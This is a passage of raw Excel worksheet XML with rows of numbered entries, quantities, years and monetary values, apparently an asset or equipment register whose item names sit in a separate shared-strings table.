      <c r="J100" s="126">
        <v>3600</v>
      </c>
      <c r="K100" s="188">
        <v>1228.8</v>
      </c>
      <c r="L100" s="10" t="s">
        <v>1614</v>
      </c>
    </row>
    <row r="101" s="175" customFormat="1" customHeight="1" spans="2:12">
      <c r="B101" s="16">
        <v>95</v>
      </c>
      <c r="C101" s="237" t="s">
        <v>1615</v>
      </c>
      <c r="D101" s="238" t="s">
        <v>1616</v>
      </c>
      <c r="E101" s="238" t="s">
        <v>1617</v>
      </c>
      <c r="F101" s="11"/>
      <c r="G101" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H101" s="11">
        <v>3</v>
      </c>
      <c r="I101" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J101" s="126">
        <v>45000</v>
      </c>
      <c r="K101" s="188">
        <v>7680</v>
      </c>
      <c r="L101" s="238" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="2:12">
      <c r="B102" s="16">
        <v>96</v>
      </c>
      <c r="C102" s="237" t="s">
        <v>1619</v>
      </c>
      <c r="D102" s="238" t="s">
        <v>1620</v>
      </c>
      <c r="E102" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F102" s="11"/>
      <c r="G102" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H102" s="11">
        <v>1</v>
      </c>
      <c r="I102" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J102" s="126">
        <v>8000</v>
      </c>
      <c r="K102" s="188">
        <v>1024</v>
      </c>
      <c r="L102" s="238" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="2:12">
      <c r="B103" s="16">
        <v>97</v>
      </c>
      <c r="C103" s="237" t="s">
        <v>1621</v>
      </c>
      <c r="D103" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E103" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F103" s="11" t="s">
        <v>1622</v>
      </c>
      <c r="G103" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H103" s="11">
        <v>1</v>
      </c>
      <c r="I103" s="11">
        <v>1996</v>
      </c>
      <c r="J103" s="126">
        <v>7000</v>
      </c>
      <c r="K103" s="188">
        <v>224</v>
      </c>
      <c r="L103" s="238" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="2:12">
      <c r="B104" s="16">
        <v>98</v>
      </c>
      <c r="C104" s="237" t="s">
        <v>1623</v>
      </c>
      <c r="D104" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E104" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F104" s="11"/>
      <c r="G104" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H104" s="11">
        <v>4</v>
      </c>
      <c r="I104" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J104" s="126">
        <v>28000</v>
      </c>
      <c r="K104" s="188">
        <v>3712</v>
      </c>
      <c r="L104" s="238" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="2:12">
      <c r="B105" s="16">
        <v>99</v>
      </c>
      <c r="C105" s="237" t="s">
        <v>1624</v>
      </c>
      <c r="D105" s="238" t="s">
        <v>1625</v>
      </c>
      <c r="E105" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F105" s="11"/>
      <c r="G105" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H105" s="11">
        <v>2</v>
      </c>
      <c r="I105" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J105" s="126">
        <v>26000</v>
      </c>
      <c r="K105" s="188">
        <v>2048</v>
      </c>
      <c r="L105" s="238" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="2:12">
      <c r="B106" s="16">
        <v>100</v>
      </c>
      <c r="C106" s="237" t="s">
        <v>1626</v>
      </c>
      <c r="D106" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E106" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F106" s="11"/>
      <c r="G106" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H106" s="11">
        <v>2</v>
      </c>
      <c r="I106" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J106" s="126">
        <v>40000</v>
      </c>
      <c r="K106" s="188">
        <v>2048</v>
      </c>
      <c r="L106" s="238" t="s">
        <v>1618</v>
      </c>
    </row>
    <row r="107" customHeight="1" spans="2:12">
      <c r="B107" s="16">
        <v>101</v>
      </c>
      <c r="C107" s="237" t="s">
        <v>1627</v>
      </c>
      <c r="D107" s="238" t="s">
        <v>1478</v>
      </c>
      <c r="E107" s="10"/>
      <c r="F107" s="11"/>
      <c r="G107" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H107" s="11">
        <v>12</v>
      </c>
      <c r="I107" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J107" s="126">
        <v>2200</v>
      </c>
      <c r="K107" s="188">
        <v>1843.2</v>
      </c>
      <c r="L107" s="238" t="s">
        <v>1628</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="2:12">
      <c r="B108" s="16">
        <v>102</v>
      </c>
      <c r="C108" s="237" t="s">
        <v>1629</v>
      </c>
      <c r="D108" s="238" t="s">
        <v>1630</v>
      </c>
      <c r="E108" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F108" s="11"/>
      <c r="G108" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H108" s="11">
        <v>7</v>
      </c>
      <c r="I108" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J108" s="126">
        <v>162000</v>
      </c>
      <c r="K108" s="188">
        <v>6496</v>
      </c>
      <c r="L108" s="238" t="s">
        <v>1631</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="2:12">
      <c r="B109" s="16">
        <v>103</v>
      </c>
      <c r="C109" s="11"/>
      <c r="D109" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E109" s="238" t="s">
        <v>1576</v>
      </c>
      <c r="F109" s="11"/>
      <c r="G109" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H109" s="11">
        <v>1</v>
      </c>
      <c r="I109" s="11"/>
      <c r="J109" s="14"/>
      <c r="K109" s="188">
        <v>1920</v>
      </c>
      <c r="L109" s="10"/>
    </row>
    <row r="110" customHeight="1" spans="2:12">
      <c r="B110" s="16">
        <v>104</v>
      </c>
      <c r="C110" s="237" t="s">
        <v>1632</v>
      </c>
      <c r="D110" s="238" t="s">
        <v>1633</v>
      </c>
      <c r="E110" s="10"/>
      <c r="F110" s="11"/>
      <c r="G110" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H110" s="11">
        <v>5</v>
      </c>
      <c r="I110" s="237" t="s">
        <v>1634</v>
      </c>
      <c r="J110" s="126">
        <v>25242.72</v>
      </c>
      <c r="K110" s="188">
        <v>10400</v>
      </c>
      <c r="L110" s="238" t="s">
        <v>1635</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="2:12">
      <c r="B111" s="16">
        <v>105</v>
      </c>
      <c r="C111" s="237" t="s">
        <v>1636</v>
      </c>
      <c r="D111" s="238" t="s">
        <v>1637</v>
      </c>
      <c r="E111" s="238" t="s">
        <v>1638</v>
      </c>
      <c r="F111" s="11"/>
      <c r="G111" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H111" s="11">
        <v>5</v>
      </c>
      <c r="I111" s="237" t="s">
        <v>968</v>
      </c>
      <c r="J111" s="126">
        <v>8500</v>
      </c>
      <c r="K111" s="188">
        <v>2880</v>
      </c>
      <c r="L111" s="238" t="s">
        <v>1639</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="2:12">
      <c r="B112" s="16">
        <v>106</v>
      </c>
      <c r="C112" s="237" t="s">
        <v>1640</v>
      </c>
      <c r="D112" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E112" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F112" s="11"/>
      <c r="G112" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H112" s="11">
        <v>1</v>
      </c>
      <c r="I112" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J112" s="126">
        <v>86000</v>
      </c>
      <c r="K112" s="188">
        <v>2380.8</v>
      </c>
      <c r="L112" s="238" t="s">
        <v>1642</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="2:12">
      <c r="B113" s="16">
        <v>107</v>
      </c>
      <c r="C113" s="237" t="s">
        <v>1643</v>
      </c>
      <c r="D113" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E113" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F113" s="11"/>
      <c r="G113" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H113" s="11">
        <v>1</v>
      </c>
      <c r="I113" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J113" s="126">
        <v>38000</v>
      </c>
      <c r="K113" s="188">
        <v>2380.8</v>
      </c>
      <c r="L113" s="238" t="s">
        <v>1642</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="2:12">
      <c r="B114" s="16">
        <v>108</v>
      </c>
      <c r="C114" s="237" t="s">
        <v>1644</v>
      </c>
      <c r="D114" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E114" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F114" s="11"/>
      <c r="G114" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H114" s="11">
        <v>1</v>
      </c>
      <c r="I114" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J114" s="126">
        <v>113600</v>
      </c>
      <c r="K114" s="188">
        <v>2380.8</v>
      </c>
      <c r="L114" s="238" t="s">
        <v>1642</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="2:12">
      <c r="B115" s="16">
        <v>109</v>
      </c>
      <c r="C115" s="237" t="s">
        <v>1645</v>
      </c>
      <c r="D115" s="238" t="s">
        <v>517</v>
      </c>
      <c r="E115" s="238" t="s">
        <v>1646</v>
      </c>
      <c r="F115" s="11" t="s">
        <v>1647</v>
      </c>
      <c r="G115" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H115" s="11"/>
      <c r="I115" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J115" s="126">
        <v>23000</v>
      </c>
      <c r="K115" s="188">
        <v>3200</v>
      </c>
      <c r="L115" s="238" t="s">
        <v>1648</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="2:12">
      <c r="B116" s="16">
        <v>110</v>
      </c>
      <c r="C116" s="237" t="s">
        <v>1649</v>
      </c>
      <c r="D116" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E116" s="238" t="s">
        <v>1650</v>
      </c>
      <c r="F116" s="11"/>
      <c r="G116" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H116" s="11">
        <v>1</v>
      </c>
      <c r="I116" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J116" s="126">
        <v>214000</v>
      </c>
      <c r="K116" s="188">
        <v>604.8</v>
      </c>
      <c r="L116" s="238" t="s">
        <v>1648</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="2:12">
      <c r="B117" s="16">
        <v>111</v>
      </c>
      <c r="C117" s="237" t="s">
        <v>1651</v>
      </c>
      <c r="D117" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E117" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F117" s="11"/>
      <c r="G117" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H117" s="11">
        <v>1</v>
      </c>
      <c r="I117" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J117" s="126">
        <v>10500</v>
      </c>
      <c r="K117" s="188">
        <v>2380.8</v>
      </c>
      <c r="L117" s="238" t="s">
        <v>1652</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="2:12">
      <c r="B118" s="16">
        <v>112</v>
      </c>
      <c r="C118" s="237" t="s">
        <v>1653</v>
      </c>
      <c r="D118" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E118" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F118" s="11"/>
      <c r="G118" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H118" s="11">
        <v>1</v>
      </c>
      <c r="I118" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J118" s="126">
        <v>5500</v>
      </c>
      <c r="K118" s="188">
        <v>2380.8</v>
      </c>
      <c r="L118" s="238" t="s">
        <v>1652</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="2:12">
      <c r="B119" s="16">
        <v>113</v>
      </c>
      <c r="C119" s="237" t="s">
        <v>1654</v>
      </c>
      <c r="D119" s="238" t="s">
        <v>1587</v>
      </c>
      <c r="E119" s="238" t="s">
        <v>1585</v>
      </c>
      <c r="F119" s="11"/>
      <c r="G119" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H119" s="11">
        <v>1</v>
      </c>
      <c r="I119" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J119" s="126">
        <v>2200</v>
      </c>
      <c r="K119" s="188">
        <v>281.6</v>
      </c>
      <c r="L119" s="238" t="s">
        <v>1655</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="2:12">
      <c r="B120" s="16">
        <v>114</v>
      </c>
      <c r="C120" s="237" t="s">
        <v>1656</v>
      </c>
      <c r="D120" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E120" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F120" s="11"/>
      <c r="G120" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H120" s="11">
        <v>1</v>
      </c>
      <c r="I120" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J120" s="126">
        <v>34000</v>
      </c>
      <c r="K120" s="188">
        <v>2380.8</v>
      </c>
      <c r="L120" s="238" t="s">
        <v>1657</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="2:12">
      <c r="B121" s="16">
        <v>115</v>
      </c>
      <c r="C121" s="237" t="s">
        <v>1658</v>
      </c>
      <c r="D121" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E121" s="238" t="s">
        <v>1641</v>
      </c>
      <c r="F121" s="11"/>
      <c r="G121" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H121" s="11">
        <v>1</v>
      </c>
      <c r="I121" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J121" s="126">
        <v>51000</v>
      </c>
      <c r="K121" s="188">
        <v>2380.8</v>
      </c>
      <c r="L121" s="238" t="s">
        <v>1657</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="2:12">
      <c r="B122" s="16">
        <v>116</v>
      </c>
      <c r="C122" s="237" t="s">
        <v>1659</v>
      </c>
      <c r="D122" s="238" t="s">
        <v>1587</v>
      </c>
      <c r="E122" s="238" t="s">
        <v>1585</v>
      </c>
      <c r="F122" s="11"/>
      <c r="G122" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H122" s="11">
        <v>2</v>
      </c>
      <c r="I122" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J122" s="126">
        <v>25950</v>
      </c>
      <c r="K122" s="188">
        <v>1228.8</v>
      </c>
      <c r="L122" s="238" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="2:12">
      <c r="B123" s="16">
        <v>117</v>
      </c>
      <c r="C123" s="237" t="s">
        <v>1661</v>
      </c>
      <c r="D123" s="238" t="s">
        <v>1662</v>
      </c>
      <c r="E123" s="238" t="s">
        <v>1585</v>
      </c>
      <c r="F123" s="11"/>
      <c r="G123" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H123" s="11">
        <v>1</v>
      </c>
      <c r="I123" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J123" s="126">
        <v>8000</v>
      </c>
      <c r="K123" s="188">
        <v>614.4</v>
      </c>
      <c r="L123" s="238" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="124" customHeight="1" spans="2:12">
      <c r="B124" s="16">
        <v>118</v>
      </c>
      <c r="C124" s="11"/>
      <c r="D124" s="10" t="s">
        <v>1522</v>
      </c>
      <c r="E124" s="10" t="s">
        <v>1663</v>
      </c>
      <c r="F124" s="11" t="s">
        <v>1664</v>
      </c>
      <c r="G124" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H124" s="11">
        <v>1</v>
      </c>
      <c r="I124" s="11">
        <v>2005</v>
      </c>
      <c r="J124" s="205"/>
      <c r="K124" s="188">
        <v>31920</v>
      </c>
      <c r="L124" s="191" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="125" customHeight="1" spans="2:12">
      <c r="B125" s="16">
        <v>119</v>
      </c>
      <c r="C125" s="11"/>
      <c r="D125" s="10" t="s">
        <v>1492</v>
      </c>
      <c r="E125" s="10" t="s">
        <v>1431</v>
      </c>
      <c r="F125" s="11" t="s">
        <v>1436</v>
      </c>
      <c r="G125" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H125" s="11">
        <v>12</v>
      </c>
      <c r="I125" s="11">
        <v>2007</v>
      </c>
      <c r="J125" s="205"/>
      <c r="K125" s="188">
        <v>25056</v>
      </c>
      <c r="L125" s="191" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="126" customHeight="1" spans="2:12">
      <c r="B126" s="16">
        <v>120</v>
      </c>
      <c r="C126" s="11"/>
      <c r="D126" s="10" t="s">
        <v>1587</v>
      </c>
      <c r="E126" s="10" t="s">
        <v>1665</v>
      </c>
      <c r="F126" s="11" t="s">
        <v>1666</v>
      </c>
      <c r="G126" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H126" s="11">
        <v>1</v>
      </c>
      <c r="I126" s="11">
        <v>1998</v>
      </c>
      <c r="J126" s="205"/>
      <c r="K126" s="188">
        <v>153.6</v>
      </c>
      <c r="L126" s="191" t="s">
        <v>1660</v>
      </c>
    </row>
    <row r="127" customHeight="1" spans="2:12">
      <c r="B127" s="16">
        <v>121</v>
      </c>
      <c r="C127" s="237" t="s">
        <v>1667</v>
      </c>
      <c r="D127" s="238" t="s">
        <v>1668</v>
      </c>
      <c r="E127" s="238" t="s">
        <v>1669</v>
      </c>
      <c r="F127" s="11"/>
      <c r="G127" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H127" s="11">
        <v>1</v>
      </c>
      <c r="I127" s="237" t="s">
        <v>1670</v>
      </c>
      <c r="J127" s="126">
        <v>500000</v>
      </c>
      <c r="K127" s="188">
        <v>4608</v>
      </c>
      <c r="L127" s="238" t="s">
        <v>1671</v>
      </c>
    </row>
    <row r="128" customHeight="1" spans="2:12">
      <c r="B128" s="16">
        <v>122</v>
      </c>
      <c r="C128" s="237" t="s">
        <v>1672</v>
      </c>
      <c r="D128" s="238" t="s">
        <v>1673</v>
      </c>
      <c r="E128" s="238" t="s">
        <v>1669</v>
      </c>
      <c r="F128" s="11"/>
      <c r="G128" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H128" s="11">
        <v>5</v>
      </c>
      <c r="I128" s="237" t="s">
        <v>1670</v>
      </c>
      <c r="J128" s="126">
        <v>48283</v>
      </c>
      <c r="K128" s="188">
        <v>10440</v>
      </c>
      <c r="L128" s="238" t="s">
        <v>1671</v>
      </c>
    </row>
    <row r="129" customHeight="1" spans="2:12">
      <c r="B129" s="16">
        <v>123</v>
      </c>
      <c r="C129" s="237" t="s">
        <v>1674</v>
      </c>
      <c r="D129" s="238" t="s">
        <v>1675</v>
      </c>
      <c r="E129" s="238" t="s">
        <v>1676</v>
      </c>
      <c r="F129" s="11"/>
      <c r="G129" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H129" s="11">
        <v>1</v>
      </c>
      <c r="I129" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J129" s="126">
        <v>12000</v>
      </c>
      <c r="K129" s="188">
        <v>0</v>
      </c>
      <c r="L129" s="238" t="s">
        <v>1677</v>
      </c>
    </row>
    <row r="130" customHeight="1" spans="2:12">
      <c r="B130" s="16">
        <v>124</v>
      </c>
      <c r="C130" s="237" t="s">
        <v>1678</v>
      </c>
      <c r="D130" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E130" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F130" s="11"/>
      <c r="G130" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H130" s="11">
        <v>1</v>
      </c>
      <c r="I130" s="237" t="s">
        <v>958</v>
      </c>
      <c r="J130" s="126">
        <v>11301</v>
      </c>
      <c r="K130" s="188">
        <v>1160</v>
      </c>
      <c r="L130" s="238" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="131" customHeight="1" spans="2:12">
      <c r="B131" s="16">
        <v>125</v>
      </c>
      <c r="C131" s="237" t="s">
        <v>1680</v>
      </c>
      <c r="D131" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E131" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F131" s="11" t="s">
        <v>1681</v>
      </c>
      <c r="G131" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H131" s="11">
        <v>2</v>
      </c>
      <c r="I131" s="237" t="s">
        <v>962</v>
      </c>
      <c r="J131" s="126">
        <v>20670</v>
      </c>
      <c r="K131" s="188">
        <v>2320</v>
      </c>
      <c r="L131" s="238" t="s">
        <v>1679</v>
      </c>
    </row>
    <row r="132" customHeight="1" spans="2:12">
      <c r="B132" s="16">
        <v>126</v>
      </c>
      <c r="C132" s="237" t="s">
        <v>1682</v>
      </c>
      <c r="D132" s="238" t="s">
        <v>1683</v>
      </c>
      <c r="E132" s="238" t="s">
        <v>1684</v>
      </c>
      <c r="F132" s="11"/>
      <c r="G132" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H132" s="11">
        <v>1</v>
      </c>
      <c r="I132" s="11">
        <v>1992</v>
      </c>
      <c r="J132" s="126">
        <v>85000</v>
      </c>
      <c r="K132" s="188">
        <v>2720</v>
      </c>
      <c r="L132" s="238" t="s">
        <v>1685</v>
      </c>
    </row>
    <row r="133" customHeight="1" spans="2:12">
      <c r="B133" s="16">
        <v>127</v>
      </c>
      <c r="C133" s="237" t="s">
        <v>1686</v>
      </c>
      <c r="D133" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E133" s="238" t="s">
        <v>1501</v>
      </c>
      <c r="F133" s="11"/>
      <c r="G133" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H133" s="11">
        <v>1</v>
      </c>
      <c r="I133" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J133" s="126">
        <v>22800</v>
      </c>
      <c r="K133" s="188">
        <v>6400</v>
      </c>
      <c r="L133" s="238" t="s">
        <v>1685</v>
      </c>
    </row>
    <row r="134" customHeight="1" spans="2:12">
      <c r="B134" s="16">
        <v>128</v>
      </c>
      <c r="C134" s="237" t="s">
        <v>1687</v>
      </c>
      <c r="D134" s="238" t="s">
        <v>1688</v>
      </c>
      <c r="E134" s="238" t="s">
        <v>1676</v>
      </c>
      <c r="F134" s="11"/>
      <c r="G134" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H134" s="11">
        <v>1</v>
      </c>
      <c r="I134" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J134" s="126">
        <v>12000</v>
      </c>
      <c r="K134" s="188">
        <v>1536</v>
      </c>
      <c r="L134" s="238" t="s">
        <v>1685</v>
      </c>
    </row>
    <row r="135" customHeight="1" spans="2:12">
      <c r="B135" s="16">
        <v>129</v>
      </c>
      <c r="C135" s="237" t="s">
        <v>1689</v>
      </c>
      <c r="D135" s="238" t="s">
        <v>1690</v>
      </c>
      <c r="E135" s="238" t="s">
        <v>1676</v>
      </c>
      <c r="F135" s="11"/>
      <c r="G135" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H135" s="11">
        <v>1</v>
      </c>
      <c r="I135" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J135" s="126">
        <v>10000</v>
      </c>
      <c r="K135" s="188">
        <v>320</v>
      </c>
      <c r="L135" s="238" t="s">
        <v>1685</v>
      </c>
    </row>
    <row r="136" customHeight="1" spans="2:12">
      <c r="B136" s="16">
        <v>130</v>
      </c>
      <c r="C136" s="237" t="s">
        <v>1691</v>
      </c>
      <c r="D136" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E136" s="238" t="s">
        <v>1692</v>
      </c>
      <c r="F136" s="11"/>
      <c r="G136" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H136" s="11">
        <v>1</v>
      </c>
      <c r="I136" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J136" s="126">
        <v>624000</v>
      </c>
      <c r="K136" s="188">
        <v>80640</v>
      </c>
      <c r="L136" s="238" t="s">
        <v>1693</v>
      </c>
    </row>
    <row r="137" customHeight="1" spans="2:12">
      <c r="B137" s="16">
        <v>131</v>
      </c>
      <c r="C137" s="237" t="s">
        <v>1694</v>
      </c>
      <c r="D137" s="238" t="s">
        <v>1695</v>
      </c>
      <c r="E137" s="238" t="s">
        <v>1696</v>
      </c>
      <c r="F137" s="11"/>
      <c r="G137" s="16" t="s">
        <v>1697</v>
      </c>
      <c r="H137" s="11">
        <v>1</v>
      </c>
      <c r="I137" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J137" s="126">
        <v>7500</v>
      </c>
      <c r="K137" s="188">
        <v>0</v>
      </c>
      <c r="L137" s="238" t="s">
        <v>1693</v>
      </c>
    </row>
    <row r="138" customHeight="1" spans="2:12">
      <c r="B138" s="16">
        <v>132</v>
      </c>
      <c r="C138" s="237" t="s">
        <v>1698</v>
      </c>
      <c r="D138" s="238" t="s">
        <v>1699</v>
      </c>
      <c r="E138" s="10"/>
      <c r="F138" s="11"/>
      <c r="G138" s="16"/>
      <c r="H138" s="11"/>
      <c r="I138" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J138" s="126">
        <v>45000</v>
      </c>
      <c r="K138" s="188">
        <v>0</v>
      </c>
      <c r="L138" s="238" t="s">
        <v>1693</v>
      </c>
    </row>
    <row r="139" customHeight="1" spans="2:12">
      <c r="B139" s="16">
        <v>133</v>
      </c>
      <c r="C139" s="237" t="s">
        <v>1700</v>
      </c>
      <c r="D139" s="238" t="s">
        <v>1701</v>
      </c>
      <c r="E139" s="238" t="s">
        <v>1702</v>
      </c>
      <c r="F139" s="11"/>
      <c r="G139" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H139" s="11">
        <v>1</v>
      </c>
      <c r="I139" s="237" t="s">
        <v>995</v>
      </c>
      <c r="J139" s="126">
        <v>68376.07</v>
      </c>
      <c r="K139" s="188">
        <v>24960</v>
      </c>
      <c r="L139" s="238" t="s">
        <v>1693</v>
      </c>
    </row>
    <row r="140" s="175" customFormat="1" customHeight="1" spans="2:12">
      <c r="B140" s="16">
        <v>134</v>
      </c>
      <c r="C140" s="237" t="s">
        <v>1703</v>
      </c>
      <c r="D140" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E140" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F140" s="11"/>
      <c r="G140" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H140" s="11">
        <v>25</v>
      </c>
      <c r="I140" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J140" s="126">
        <v>274000</v>
      </c>
      <c r="K140" s="188">
        <v>23200</v>
      </c>
      <c r="L140" s="238" t="s">
        <v>1704</v>
      </c>
    </row>
    <row r="141" customHeight="1" spans="2:12">
      <c r="B141" s="16">
        <v>135</v>
      </c>
      <c r="C141" s="237" t="s">
        <v>1705</v>
      </c>
      <c r="D141" s="238" t="s">
        <v>1701</v>
      </c>
      <c r="E141" s="238" t="s">
        <v>1702</v>
      </c>
      <c r="F141" s="11"/>
      <c r="G141" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H141" s="11">
        <v>1</v>
      </c>
      <c r="I141" s="237" t="s">
        <v>478</v>
      </c>
      <c r="J141" s="126">
        <v>25641.03</v>
      </c>
      <c r="K141" s="188">
        <v>24960</v>
      </c>
      <c r="L141" s="238" t="s">
        <v>1706</v>
      </c>
    </row>
    <row r="142" customHeight="1" spans="2:12">
      <c r="B142" s="16">
        <v>136</v>
      </c>
      <c r="C142" s="237" t="s">
        <v>1707</v>
      </c>
      <c r="D142" s="238" t="s">
        <v>1708</v>
      </c>
      <c r="E142" s="238" t="s">
        <v>1676</v>
      </c>
      <c r="F142" s="11"/>
      <c r="G142" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H142" s="11">
        <v>1</v>
      </c>
      <c r="I142" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J142" s="126">
        <v>12000</v>
      </c>
      <c r="K142" s="188">
        <v>1536</v>
      </c>
      <c r="L142" s="238" t="s">
        <v>1709</v>
      </c>
    </row>
    <row r="143" customHeight="1" spans="2:12">
      <c r="B143" s="16">
        <v>137</v>
      </c>
      <c r="C143" s="237" t="s">
        <v>1710</v>
      </c>
      <c r="D143" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E143" s="238" t="s">
        <v>1711</v>
      </c>
      <c r="F143" s="11"/>
      <c r="G143" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H143" s="11">
        <v>1</v>
      </c>
      <c r="I143" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J143" s="126">
        <v>260000</v>
      </c>
      <c r="K143" s="188">
        <v>34560</v>
      </c>
      <c r="L143" s="238" t="s">
        <v>1712</v>
      </c>
    </row>
    <row r="144" customHeight="1" spans="2:12">
      <c r="B144" s="16">
        <v>138</v>
      </c>
      <c r="C144" s="237" t="s">
        <v>1713</v>
      </c>
      <c r="D144" s="238" t="s">
        <v>1522</v>
      </c>
      <c r="E144" s="238" t="s">
        <v>1711</v>
      </c>
      <c r="F144" s="11"/>
      <c r="G144" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H144" s="11">
        <v>1</v>
      </c>
      <c r="I144" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J144" s="126">
        <v>286000</v>
      </c>
      <c r="K144" s="188">
        <v>34560</v>
